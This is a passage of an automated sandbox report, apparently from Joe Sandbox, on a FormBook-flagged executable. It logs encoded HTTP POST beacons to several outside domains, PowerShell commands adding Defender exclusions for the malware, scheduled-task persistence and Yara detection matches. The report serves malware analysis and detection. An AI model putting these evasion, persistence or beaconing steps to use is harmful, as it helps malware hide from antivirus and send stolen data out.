                                      Date: Mon, 10 Jun 2024 08:23:43 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      47 | 192.168.2.5 | 51413 | 64.226.69.42 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:44.929532051 CEST | 1748 | OUT | POST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:45.764549017 CEST | 300 | IN | HTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:45 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      48 | 192.168.2.5 | 51414 | 64.226.69.42 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:47.463475943 CEST | 454 | OUT | GET /1134/?kH=00U8ENLHk&TTv82Lg=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:48.285732031 CEST | 297 | IN | HTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:48 GMT
                                      Content-Type: text/html
                                      Content-Length: 150
                                      Connection: close
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      49 | 192.168.2.5 | 51415 | 3.64.163.50 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:53.449083090 CEST | 726 | OUT | POST /fhu0/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=99f8JQIzfM/KkULBuW1d9qIebIN1fI6cD6NOr1i9AmtX+g2z3CKqukUkPoX4zjij/+D9/FDNZSyU4UbnaO8/5ocX1ps26a/GgmWNNXE8Ddr4HAh4QM4xbxrTrAiL7uNI8l+Kl6NktG0ObZSfg5bG+xs7liRe2Owk+/Ntd5v4NLcMmgQ7xIkII0G0200OrFXQXwHegNI=
                                      Jun 10, 2024 10:23:54.274609089 CEST | 294 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:54 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      50 | 192.168.2.5 | 51416 | 3.64.163.50 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:56.137962103 CEST | 746 | OUT | POST /fhu0/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=99f8JQIzfM/KlwPBhVtdxaIRUoN1Uo6YD6BOr0X2BU5X+FSz2GmqtkUkBIX9+Diq/+H1/AjNZSOU4Vrna5o8rIcV5Js0nq/GgmWNNU4WDdj4Hz54fIM2SRrQigiL2ONE8l/vl7RCtDwObYifhobFrhs9qCQb/eEs7c1wWfv4M9c2q29RrqsgbUqMmn856125NTXu+ae/hDCwc41kHHkD+/YnDiVi
                                      Jun 10, 2024 10:23:56.960325956 CEST | 294 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:56 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      51 | 192.168.2.5 | 51417 | 3.64.163.50 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:23:58.662898064 CEST | 1763 | OUT | POST /fhu0/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.webuyfontana.com
                                      Referer: http://www.webuyfontana.com/fhu0/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:59.498358965 CEST | 294 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:59 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      52 | 192.168.2.5 | 51418 | 3.64.163.50 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:24:01.195677996 CEST | 459 | OUT | GET /fhu0/?TTv82Lg=w/3cKlYOZ7/u5gm7pV9f/KUaDpReXY6iTJBfq3uhFW9siwux7V61qX9CS7/86gr+3Jfc1RyXdSHIkUzafqUvuKZrochJkYXYnzSwKE48OKXAFHRmaq8ieG3R1w7I9MISvw==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.webuyfontana.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:24:02.011998892 CEST | 294 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:24:01 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.webuyfontana.com/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      53 | 192.168.2.5 | 51419 | 172.67.160.38 | 80 | 2608 | C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:24:07.414326906 CEST | 738 | OUT | POST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ISbM6wCyyRp6L0yU/ymRMf53lzQnFR2DxzLArNio3BhdXqhbuWJCO3B+Frhc7PtMHxPc0eVyUkD6DWmfJMTw8EPzqrejYoFJ0H7I6YIur/4tHvOYfh5f4aKLZ8JpjuhtpRJWghkwxufuo7KA/9ie2IMRTwCRgFDljif5gHOSoOUOu6fAussOUdyOxsQV10fIRSoQmWg=
                                      Jun 10, 2024 10:24:08.020169973 CEST | 876 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:07 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:07 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUsge%2FpCs6k8LdhGvJrFHP%2F%2FjdmI%2F7pDa5AxqsBo5gHJ7F6NpFxntNIt8NH%2BmR3a9e8sJLgyKKoCqazyDuomH%2FR%2B5q3%2FQX5uto%2B2NP9sQQej3Q%2B9InT2LFipqpLGVnj1vbbbE5YeJNUyTG8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f699b85ae823-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      54 | 192.168.2.5 | 51420 | 172.67.160.38 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:24:10.278191090 CEST | 758 | OUT | POST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Ascii: TTv82Lg=ISbM6wCyyRp6KViUsFyRbv52gzQnPx3KxzHArIb1wzFdUPNbtXJCL3B+OLgW1vt9HxDU0btyUgj6DW2fI9Tz9UOVhLehWIFJ0H7I6YMIr7ctEe+YfDBQ16KEe8JppOhppRJ4gkEexsXuo66A+oOZ/IMtNwDgxkboqkTjpGjA0Pw1rMyq0OkmH9e2h/YikE+hLx4g4B01yMGJxM8HCoVzYYHREa4P
                                      Jun 10, 2024 10:24:10.864821911 CEST | 866 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:10 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:10 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcvDWxVob5twS9O6Fh445e8sms5EW4%2Bo%2BamINcI%2FjqbgPagfBqIYIdsnzENbbqLX0cXhP8Zb9ttHC%2BZVNPU3ig%2BaKxsix3Smudew6GKZtRX0gzBhlW9FL2PWiVaU8FKzhzLwXJZ7SyDHHsk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f6ab7e92e5ea-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      55 | 192.168.2.5 | 51421 | 172.67.160.38 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:24:12.804169893 CEST | 1775 | OUT | POST /wzcd/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.lunareafurniture.com
                                      Referer: http://www.lunareafurniture.com/wzcd/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:24:13.422354937 CEST | 864 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:13 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:13 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkr%2FgyTBjiZFchZ0%2F6G96V%2F5z08xuIX8enxm96m3QDzNlVzJBS09MDoSGecgaFmlzLWgHn3dDBO7A2a4KWjw%2BC7oQJxnwAifzFmarncAcMu8LXd2kJORfw35bAJh19YJcx08fMRkOp3X3FQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Vary: Accept-Encoding
                                      Server: cloudflare
                                      CF-RAY: 8917f6bb7a4b6b27-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      56 | 192.168.2.5 | 51422 | 172.67.160.38 | 80
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 10, 2024 10:24:15.334767103 CEST | 463 | OUT | GET /wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.lunareafurniture.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:24:15.937398911 CEST | 991 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Mon, 10 Jun 2024 08:24:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Mon, 10 Jun 2024 09:24:15 GMT
                                      Location: https://www.lunareafurniture.com/wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g==
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo6f34OOvsIkW%2Fd5KEC60ZqOj%2FoXU85YBYgdv7so2uriV7w6rgTV89w5FMVOvbQCRGfTlBnfXqXyafnccAoJ7PkZ212cZWOlHAtJIW3raGKei7G6NvpWfDbIDsaYXdl1AOUpMU0it0ozIxg%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8917f6cb29812c8e-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>



                                      Target ID:0
                                      Start time:04:20:01
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0xec0000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:04:20:02
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x4d0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:04:20:02
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x4d0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"
                                      Imagebase:0x740000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:04:20:03
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x440000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x290000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x120000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:04:20:04
                                      Start date:10/06/2024
                                      Path:C:\Users\user\Desktop\CFV20240600121.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\CFV20240600121.exe"
                                      Imagebase:0x740000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:04:20:06
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Imagebase:0x480000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 29%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:04:20:07
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff6ef0c0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:04:20:10
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"
                                      Imagebase:0x740000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:16
                                      Start time:04:20:10
                                      Start date:10/06/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:17
                                      Start time:04:20:11
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x70000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:18
                                      Start time:04:20:11
                                      Start date:10/06/2024
                                      Path:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
                                      Imagebase:0x650000
                                      File size:773'640 bytes
                                      MD5 hash:8874212365EF57AEEE15045F9EC684EB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:20
                                      Start time:04:20:26
                                      Start date:10/06/2024
                                      Path:C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe"
                                      Imagebase:0x870000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
